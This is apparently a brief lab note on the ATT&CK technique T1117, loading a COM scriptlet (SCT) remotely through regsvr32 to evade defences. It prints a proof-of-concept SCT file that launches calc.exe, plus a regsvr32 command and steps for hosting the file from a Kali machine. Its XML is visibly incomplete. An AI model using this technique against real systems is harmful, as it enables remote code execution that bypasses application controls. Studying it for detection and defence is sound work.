ID: T1117 Tactic: Defense Evasion, Execution

This technique uses a SCT file loaded remotely.

SCT: Script used to create a Component Object Model (.COM) component, may be written in various scripting languages such as VBScript, JavaScript, or JScript; runs itself in Windows if the Windows Scripting Host is installed.

A very basic SCT file that will execute calc.exe :

<?XML version="1.0"?>
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
		var scr = new ActiveXObject("MSScriptControl.ScriptControl");
		scr.Language = "JScript";
		scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		//Lots of hints here on futher obfuscation

I will host this on my Kali box using python3

sudo python3 -m http.server 80

Now let's call it from our Victim Box.

And execute


Last updated